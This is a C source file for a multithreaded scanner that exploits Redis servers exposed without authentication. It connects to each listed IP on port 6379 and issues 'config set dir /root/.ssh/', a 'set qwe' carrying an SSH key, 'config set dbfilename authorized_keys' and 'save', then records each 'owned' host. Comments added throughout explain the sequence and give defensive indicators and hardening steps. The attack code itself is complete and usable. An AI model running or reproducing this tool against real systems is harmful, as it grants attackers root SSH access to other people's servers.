- /*
- gcc -o exploit *.c -pthread -w
- */
- #include <stdio.h>
- #include <stdlib.h>
- #include <stdbool.h>
- #include <string.h>
- #include <unistd.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <sys/ioctl.h>
- #include <netinet/in.h>
- #include <poll.h>
- #include <netdb.h>
- #include <pthread.h>
- #include <fcntl.h>
- #include <errno.h>
- #include <netinet/tcp.h>
- #include "thpool.h"
/* Byte count used for every bzero()/read() on the reply buffer in connect_w_to(). */
#define BUFSIZE 1024
/* Run configuration: main() copies argv[1..5] into the next five globals. */
char* ip_file;              /* argv[1]: file FileReader() loads; main() splits it on '\n' */
char* ip_out_file;          /* argv[2]: file writeLine() appends to when connect_w_to() returns true */
char* private_key_location; /* argv[3]: file whose last line FileReader() embeds in payload */
int nb_threads;             /* argv[4]: value handed to thpool_init() */
int timeout;                /* argv[5]: seconds assigned to tv_sec before every select() */
int target_port = 6379; //redis port
char *file_contents;        /* raw bytes of ip_file, filled by FileReader() */
/*
 * Text that FileReader() places inside the payload.
 * NOTE(review): the sequence later names the dump file "authorized_keys",
 * which holds public keys, so despite the variable name this is presumably
 * a public-key line; confirm against the input file.
 */
char *privateKey;
/* The Redis "set qwe ..." command text built once by FileReader() and sent by connect_w_to(). */
char payload[5000] = {0};
size_t num;                 /* token count written by strsplit() in main() */
char **lines;               /* tokens of file_contents, one per input line */
int current_line;           /* declared but not referenced in the visible code */
/*
 * Loads the two input files named on the command line into globals.
 *
 *   1. Reads all of ip_file into the heap buffer file_contents.
 *   2. Reads private_key_location line by line, keeps the last line read,
 *      removes its final character and formats it into the global payload
 *      as a Redis inline command:  set qwe "\n\n<line>\n\n\n"
 *      (the \n sequences are literal backslash-n escapes inside the quoted
 *      argument, followed by one real newline that ends the command).
 *
 * Takes no arguments and returns nothing. The finished payload is echoed to
 * stdout, so the embedded key text ends up in any captured output.
 *
 * Defensive note: the key name "qwe" is hard-coded here, so a key of that
 * name holding SSH key material on a Redis instance is an indicator worth
 * checking during triage of an exposed server.
 */
void FileReader() {
    long input_file_size;
    /* Determine the size of ip_file by seeking to its end, then rewind to read it. */
    FILE *input_file = fopen(ip_file, "rb");
    fseek(input_file, 0, SEEK_END);
    input_file_size = ftell(input_file);
    rewind(input_file);
    /* Exactly input_file_size bytes are allocated and read. */
    file_contents = malloc(input_file_size * (sizeof(char)));
    fread(file_contents, sizeof(char), input_file_size, input_file);
    fclose(input_file);
    FILE *f; /* not used anywhere below */
    privateKey = (char*)malloc(sizeof(char) * 1000);
    FILE *infile;
    infile = fopen(private_key_location, "rb");
    char line_buffer[1024];
    /*
     * Every iteration re-points privateKey at the local line_buffer, so after
     * the loop it refers to the last line read rather than to the 1000-byte
     * allocation made above.
     */
    while (fgets(line_buffer, sizeof(line_buffer), infile)) {
        privateKey = line_buffer;
    }
    /* Overwrite the final character of that line (the newline, when the line ends with one). */
    privateKey[strlen(privateKey) - 1] = '\0';
    /* Build the command once; connect_w_to() sends the same payload to every host. */
    sprintf(payload, "set qwe \"\\n\\n%s\\n\\n\\n\"\n", privateKey);
    printf("\npayload: %s\n", payload);
    fclose(infile);
}
/*
 * Appends `content` plus a trailing newline to the file named `fileName`.
 *
 * The file is opened in append mode, so it is created when missing and
 * earlier lines are kept. If it cannot be opened, a message is printed to
 * stdout and nothing is written. Returns nothing.
 */
void writeLine(char *fileName, char *content)
{
    FILE *out = fopen(fileName, "a");

    if (out != NULL) {
        fprintf(out, "%s\n", content);
        fclose(out);
        return;
    }

    printf("There was an error when writing to the file!\n");
}
/*
 * Runs the Redis "CONFIG SET dir / CONFIG SET dbfilename / SAVE" file-write
 * sequence against one host on target_port and reports whether every step
 * before the final SAVE was acknowledged.
 *
 * hostname: dotted-quad IPv4 text; it goes straight to inet_addr(), so no
 *           name resolution happens here.
 * Returns:  true only on the path that writes "save" and appends hostname
 *           to ip_out_file; every other path returns false. The reply to
 *           "save" is never read, so a true result (and an entry in the
 *           output file) means the command was sent, not that the dump
 *           file was written.
 *
 * Wire sequence, each step sent only if the previous reply contains "OK":
 *   1. config set dir /root/.ssh/
 *   2. the global payload built by FileReader() ("set qwe ...")
 *   3. config set dbfilename "authorized_keys"
 *   4. save
 *
 * No AUTH command is sent anywhere in this function, so the sequence
 * presumes an instance that accepts commands from the network without
 * authentication, and step 4 can only produce the file if the Redis
 * process is allowed to write under /root/.ssh.
 *
 * Defensive context: exposure is removed by binding Redis to loopback or a
 * private interface, keeping protected-mode on, setting requirepass or
 * ACLs, restricting CONFIG (rename-command or ACL rules), running
 * redis-server as an unprivileged user, and firewalling the port. Things
 * to look for when triaging a host: CONFIG SET dir / dbfilename issued by a
 * remote client, a dbfilename that is not an .rdb file, a key named "qwe",
 * and an authorized_keys file that contains Redis dump data.
 */
bool connect_w_to(char *hostname) {
    int res, valopt;
    struct sockaddr_in addr;
    long arg;
    fd_set myset;
    struct timeval tv;
    socklen_t lon;
    char buf[4048];
    int soc = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (soc < 0)
    {
        printf("Error creating socks.\n");
        return false;
    }
    /* Switch the socket to non-blocking so connect() can be bounded by select(). */
    if ((arg = fcntl(soc, F_GETFL, NULL)) < 0)
    {
        fprintf(stderr, "Error fcntl(.., F_GETFL): %s\n", strerror(errno));
        return false;
    }
    arg |= O_NONBLOCK;
    if (fcntl(soc, F_SETFL, arg))
    {
        fprintf(stderr, "Error fcntl(.., F_SETFL): %s\n", strerror(errno));
        return false;
    }
    int val = 1;
    if (setsockopt(soc, IPPROTO_TCP, TCP_NODELAY, &val, sizeof(val)) < 0)
    {
        return false;
    }
    addr.sin_family = AF_INET;
    addr.sin_port = htons(target_port);
    addr.sin_addr.s_addr = inet_addr(hostname);
    res = connect(soc, (struct sockaddr *)&addr, sizeof(addr));
    if (res < 0) {
        if (errno == EINPROGRESS) {
            /* Wait up to `timeout` seconds for the socket to become writable. */
            FD_ZERO(&myset);
            FD_SET(soc, &myset);
            tv.tv_sec = timeout;
            tv.tv_usec = 0;
            if (select(soc+1, NULL, &myset, NULL, &tv) > 0) {
                /* Writable: SO_ERROR tells whether the connect actually succeeded. */
                lon = sizeof(int);
                getsockopt(soc, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
                if (valopt) {
                    fprintf(stderr, "Error in connection() %d - %s\n", valopt, strerror(valopt));
                    close(soc);
                    return false;
                }
                /* Connected: clear O_NONBLOCK again for the command exchange. */
                arg = fcntl(soc, F_GETFL, NULL);
                arg &= (~O_NONBLOCK);
                fcntl(soc, F_SETFL, arg);
                /* Step 1: ask the server to change its working directory. */
                if (send(soc, "config set dir /root/.ssh/\n", 27, MSG_DONTWAIT) < 0) {
                    printf("Error sending config set...");
                    close(soc);
                    return false;
                }
                else {
                    int reader = -1;
                    /* Only the first BUFSIZE bytes of buf are cleared and read into. */
                    bzero(buf, BUFSIZE);
                    FD_ZERO(&myset);
                    FD_SET(soc,&myset);
                    tv.tv_sec = timeout;
                    tv.tv_usec = 0;
                    if (select(soc+1, &myset, NULL, NULL, &tv) < 0) {
                        printf("select error");
                        reader = -1;
                    }
                    if (FD_ISSET(soc, &myset)) {
                        reader = read(soc, buf, BUFSIZE);
                    }
                    else {
                        printf("timeout\n");
                        reader = -1;
                    }
                    /* The raw server reply is echoed to stdout. */
                    printf("DATA: %s\n", buf);
                    if(reader < 0) {
                        printf("Error reading response of config set...\n");
                        close(soc);
                        return false;
                    }
                    else {
                        /* A reply containing "OK" is treated as acceptance of step 1. */
                        if((strstr(buf, "OK") != NULL)) {
                            /* Step 2: store the key text under the key "qwe". */
                            write(soc, payload, strlen(payload));
                            printf("payload %s\n", payload);
                            bzero(buf, BUFSIZE);
                            FD_ZERO(&myset);
                            FD_SET(soc,&myset);
                            tv.tv_sec = timeout;
                            tv.tv_usec = 0;
                            if (select(soc+1, &myset, NULL, NULL, &tv) < 0) {
                                printf("select error");
                                reader = -1;
                                close(soc);
                                return false;
                            }
                            if (FD_ISSET(soc, &myset)) {
                                read(soc, buf, BUFSIZE);
                                //printf("is it stopping0: %s\n", buf);
                            }
                            else {
                                printf("timeout\n");
                                reader = -1;
                                close(soc);
                                return false;
                            }
                            //printf("is it stopping2: %s\n", buf);
                            if((strstr(buf, "OK") != NULL)) {
                                /* Step 3: rename the dump file the server will write. */
                                write(soc, "config set dbfilename \"authorized_keys\"\n", 40);
                                //read(soc, buf, BUFSIZE);
                                bzero(buf, BUFSIZE);
                                FD_ZERO(&myset);
                                FD_SET(soc,&myset);
                                tv.tv_sec = timeout;
                                tv.tv_usec = 0;
                                if (select(soc+1, &myset, NULL, NULL, &tv) < 0) {
                                    printf("select error");
                                    reader = -1;
                                    close(soc);
                                    return false;
                                }
                                if (FD_ISSET(soc, &myset)) {
                                    read(soc, buf, BUFSIZE);
                                    //printf("is it stopping0: %s\n", buf);
                                }
                                else {
                                    printf("timeout\n");
                                    reader = -1;
                                    close(soc);
                                    return false;
                                }
                                if((strstr(buf, "OK") != NULL)) {
                                    /*
                                     * Step 4: request the dump, then record the host.
                                     * The reply to "save" is not read before returning true.
                                     */
                                    write(soc, "save\n", 6);
                                    writeLine(ip_out_file, hostname);
                                    close(soc);
                                    return true;
                                }
                            }
                        }
                        else
                        {
                            /* Step 1 was not acknowledged with "OK". */
                            close(soc);
                            return false;
                        }
                    }
                }
            }
            else {
                /* select() returned 0 (timeout) or a negative value (error). */
                fprintf(stderr, "Timeout or error() %d - %s\n", valopt, strerror(valopt));
                close(soc);
                return false;
            }
        }
        else {
            close(soc);
            fprintf(stderr, "Error connecting %d - %s\n", errno, strerror(errno));
            return false;
        }
    }
    /*
     * Reached when connect() returned 0 immediately, or when the reply to
     * step 2 or step 3 did not contain "OK".
     */
    close(soc);
    return false;
}
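/*
 * Splits `str` on any character found in `delim`.
 *
 * Adjacent delimiters yield empty tokens and an empty input yields one
 * empty token, so a successful call always returns at least one token.
 *
 * str:       NUL-terminated input; it is not modified.
 * delim:     NUL-terminated set of delimiter characters.
 * numtokens: receives the number of tokens returned (0 on failure).
 *
 * Returns a heap array of heap-allocated strings. The caller owns both and
 * must free() every element and then the array. Returns NULL, with
 * *numtokens set to 0 and nothing leaked, when str or delim is NULL or an
 * allocation fails.
 */
char **strsplit(const char* str, const char* delim, size_t* numtokens) {
    size_t capacity = 1;
    size_t used = 0;
    char **tokens;
    const char *cursor = str;

    *numtokens = 0;
    if (str == NULL || delim == NULL) {
        return NULL;
    }

    tokens = calloc(capacity, sizeof *tokens);
    if (tokens == NULL) {
        return NULL;
    }

    for (;;) {
        /* Length of the token that starts at cursor. */
        size_t len = strcspn(cursor, delim);
        char *copy;

        if (used == capacity) {
            char **grown;

            /* Refuse to double when the byte count would wrap around. */
            if (capacity > ((size_t)-1) / (2 * sizeof *tokens)) {
                goto fail;
            }
            /* Keep the old pointer until realloc() is known to have worked. */
            grown = realloc(tokens, capacity * 2 * sizeof *tokens);
            if (grown == NULL) {
                goto fail;
            }
            tokens = grown;
            capacity *= 2;
        }

        copy = malloc(len + 1);
        if (copy == NULL) {
            goto fail;
        }
        memcpy(copy, cursor, len);
        copy[len] = '\0';
        tokens[used++] = copy;

        if (cursor[len] == '\0') {
            break;
        }
        cursor += len + 1; /* step over the delimiter */
    }

    {
        /* Trim unused slots; if trimming fails the larger array is still valid. */
        char **fit = realloc(tokens, used * sizeof *tokens);
        if (fit != NULL) {
            tokens = fit;
        }
    }

    *numtokens = used;
    return tokens;

fail:
    while (used > 0) {
        free(tokens[--used]);
    }
    free(tokens);
    return NULL;
}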
/*
 * Runs connect_w_to() for one host and prints a one-line result to stdout.
 *
 * content: the host string, passed unchanged to connect_w_to().
 * Both messages are wrapped in the same ANSI colour sequence (\x1b[32m).
 */
void WorkingPayload(char *content)
{
    const bool accepted = connect_w_to(content);

    if (!accepted) {
        printf("\x1b[32m[-] Failed to own server IP --> %s\x1b[0m\n", content);
        return;
    }

    printf("\x1b[32m[+] Owned server IP --> %s\x1b[0m\n", content);
}
/*
 * Thread-pool job body: treats `line` as a host string and hands it to
 * WorkingPayload(). The integer 1 is returned converted to a pointer.
 */
int *worker(void *line)
{
    char *host = (char *)line;

    WorkingPayload(host);
    return (int *)1;
}
/*
 * Copies the NUL-terminated string `source` into `target`, terminator
 * included. No length is passed, so the caller must make sure `target`
 * has room for strlen(source) + 1 bytes.
 */
void copy_string(char *target, char *source)
{
    size_t pos = 0;

    for (; source[pos] != '\0'; pos++) {
        target[pos] = source[pos];
    }
    target[pos] = '\0';
}
/*
 * Entry point. Expects five arguments: input list, output file, key file,
 * thread count and timeout in seconds. With fewer, the usage text is
 * printed and the process exits with status 1.
 *
 * The arguments are stored in the file-level globals, FileReader() loads
 * the inputs, the input list is split on '\n', and one worker() job per
 * line is queued on a thread pool of nb_threads threads. The loop bound is
 * num - 1, so the last token is not queued (presumably the empty token
 * after the final newline of the list; confirm against the input format).
 * num is a size_t, so that comparison is done in unsigned arithmetic.
 */
int main(int argc, char **argv)
{
    if (argc < 6) {
        printf("Usage: %s in_ip out_ip rsa_loc nb_threads timeout\ncat /proc/sys/kernel/threads-max\ncat /proc/sys/fs/file-max\n",argv[0]);
        exit(1);
    }

    ip_file = argv[1];
    ip_out_file = argv[2];
    private_key_location = argv[3];
    nb_threads = atoi(argv[4]);
    timeout = atoi(argv[5]);

    FileReader();
    lines = strsplit(file_contents, "\n", &num);

    threadpool pool = thpool_init(nb_threads);
    int idx = 0;
    while (idx < num - 1) {
        thpool_add_work(pool, worker, lines[idx]);
        idx++;
    }

    /* Block until every queued job has finished before tearing the pool down. */
    thpool_wait(pool);
    thpool_destroy(pool);
    return 0;
}